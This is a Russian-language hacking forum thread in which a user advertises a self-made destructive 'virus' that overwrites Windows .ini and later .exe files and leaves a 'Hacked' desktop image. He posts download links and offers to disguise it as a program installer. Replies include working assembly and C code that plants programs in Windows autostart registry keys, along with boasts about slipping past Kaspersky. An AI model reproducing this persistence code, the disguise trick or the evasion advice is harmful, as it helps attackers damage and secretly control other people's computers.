Привет всем, вот наконец-то я в сети, эх. Вот набросал вирусняк(просто видел сравнительно недавно как кто-то кидал на форум вир свой, решил сделать также свой).
Его действия:
1)в папке windows стирает все содержимое файлов ini и дописывает строку:"It is marked with a virus the Sn@k3'a - "Hunter snake's"
2)Далее делает файл с знаменитым кодо" svhost.exe -s"в папочке по пути "C:\Documents and Settings\имя пользователя, который собственно и запустил вирус\Главное меню\Программы\Автозагрузк а" З.Ы. хотел вообщем в реестре заместит, но если винда всеровно будет не рабочая, то зачем....Тем более он в таком случае будет палиться каспером
3)и на последок решил оставить красивую картинку на рабочем столе =) с пожеланием и так всем известной словом Hacked =))). не удержался ))).
Вообщем так могу также данную программу наростить до любых размеров(в разумных пределах, у меня модем/в архиве ~40 кб, без него ~150 кб). Можно спрятать с любой программой, т.е. имитировать её установщик, нет проблем, крч ваши пожелания и добавления. Это не первый мой вирус, эх остальное убыло в небытие. Вообщем зацените вирус Hunter Snake's =).
скачать >>> (http://virus-hanter.narod.ru/virus.rar)

Вообщем зацените вирус Hunter Snake's =). и попробуйте на себе... :). Нормально.

да ладно, можету кого-нибудь есть пробешенный комп или вторая винда =) но только на C:\. =).

хрень

хрень
коротко и ясно :)
киборг, для начала собственно протестируй , а уж после рассуждай

Вирьмейкеры йопта.... как писал Bug(o)r , это может сделать любой кто прочитает 50-70 страниц учебника по программированию...

Народ, WMvare рулит ;)

не позорьте слово "вирус". Ещё с таким видом пишешь, как будто прям кодер всия Руси.

Понимаю вирь сделать который РЕАЛЬНО ЗАРАЖАЕТ КОМП... "вливатеся" в открываемыйе файлы, архивы, и т.д. пересылается по почте, диски... Который сидит до определенного момента, например дать ему дату типа 01.01.2007.= С НОВЫМ ГОДОМ ПРИДУРОК!!! или ПОКУПАЙТЕ НАШИ НОСКИ, И вирь валит винт... Или еще чего...

Полностью согласен :)

Ссла битая

Ну и порожняк ! Ну вы бы еще bat-файлы с командами типа del *.* выкладывали ! И почитай 29A чтобы иметь хоть смутное представление о том ЧТО ТАКОЕ ВИРУС !

Хм,да ладно,человек может начинающий,решил выложить,узнать на верном ли он пути,а вы его грузите.Может следующий будет лучше...

а гляньте мой?
http://forum.antichat.ru/showthread.php?t=23156&goto=newpost

Не тупите, это не вирусы, а хреново написанный деструктивный ацтой.

tclover, полностью согласен.

Кстати, программы, которые пишут в HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run какую-нибудь инфу, ни Каспером, ни SAV CE не палятся, проверено лично. Другое дело, что этому "вирусу" это в натуре не нужно.

а как в делфи сделать так чтоб он туды записался

зы
ссори шо не в тему...

;use fasm to compile this sheat
include 'win32ax.inc'

.code

start:



push eax
invoke RegOpenKeyEx,\
HKEY_LOCAL_MACHINE,\
"SOFTWARE\Microsoft\Windows\CurrentVersion\ShellSer viceObjectDelayLoad",\
0,\
KEY_READ+KEY_WRITE,\
esp
pop eax
invoke RegSetValueEx,\
eax,\
"netagent",\
0,\
REG_SZ,\
"test",\
4
invoke MessageBox,HWND_DESKTOP,"Программа 123 успешно помешена в автозагрузку.","Готово ...",MB_OK

invoke ExitProcess,0

.end start
зы сори шо нефтему

спасибо!!!!!
+ твой! не помешает...

tclover, чувак над было сразу опкодами написать :D

Понимаю вирь сделать который РЕАЛЬНО ЗАРАЖАЕТ КОМП... "вливатеся" в открываемыйе файлы, архивы, и т.д. пересылается по почте, диски... Который сидит до определенного момента, например дать ему дату типа 01.01.2007.= С НОВЫМ ГОДОМ ПРИДУРОК!!! или ПОКУПАЙТЕ НАШИ НОСКИ, И вирь валит винт... Или еще чего...
вот нормальное предложение, такс думаю проблема будет с отркытыми фафлами, а так можно и вместо ini Exe и dll спокойно валить, так что виндовс свалиться без проблем. я подумаю =)

']Кстати, программы, которые пишут в HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run какую-нибудь инфу, ни Каспером, ни SAV CE не палятся, проверено лично. Другое дело, что этому "вирусу" это в натуре не нужно.

бугагага вот именно я бы тогда и сделал в реестр, так как каспер, то и палит!!!!!!! это я ещё узнал давным давно, даже когда у меня был старый каспер!

ссыла обновилась! http://slil.ru/23069868
Кстати теперь он портит не ini, а EXE, что естественно выведет из строя винду

Горбатого могила исправит.

tclover И не говори +)
эй а ты чего тут делаешь? ты htnl выучил? )

Неа :( Возьми меня в ученики падшая сволоч!

ээээ чего-то ты разошелся, ты так низко пал =). а чего ругаешься? мы цывилизованные люди.

http://webfile.ru/1080663

Написана на языке С (Visual C), не делает ничего плохого - только заносит в реестр в ключ автозагрузки , откуда ее запустили под именем damned.
Проверь, Sn@k3, неужто Каспер вот прямо сходу несчастную программу выпалит?
----------------
#include<stdio.h>
#include<string.h>
#include<windows.h>

#pragma comment(linker,"/MERGE:.rdata=.text")
#pragma comment(linker,"/FILEALIGN:512 /SECTION:.text,EWRX /IGNORE:4078")
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(linker,"/NODEFAULTLIB")

//********************************************
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR szCmdLine, int nCmdShow)
{
int nSize;
char *file_path;
char *buf;

char **argv;
DWORD argc;

long int result;
HKEY hKey;

SetErrorMode(SEM_NOGPFAULTERRORBOX);

//******************************************
argv = CommandLineToArgvW(GetCommandLineW(), &argc);

buf = (char *)malloc(256);
file_path = (char *)malloc(256);

nSize = GetCurrentDirectory(256, buf);
buf[nSize + 1] = '\0';

sprintf(file_path, "%s\\%ws", buf, argv[0]);
result = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hKey);

// заносим в реестр .../Run под именем damned
RegSetValueEx(hKey, "damned", 0, REG_SZ, file_path, strlen(file_path));
RegCloseKey(hKey);

exit(0);
}

эх блин вирь писатель хренов
ты Че ВИрусоПисателей позориш та

по моему статья херовая

Неа Возьми меня в ученики падшая сволоч!
Клевер жоош
но кстати ты прав
СВОЛАЧАМ падшим не чего делать на ачате

Отжог ыыыыы пацотолом

мы цывилизованные люди.
хм... цИвилизованные правильно пишут это слово через И

Хм... Интересно, что на webfile.ru все файлы проверяются именно Касперским, мой откомлиленный "супертрой" свободно доступен - Касперский ничего не заподозрил.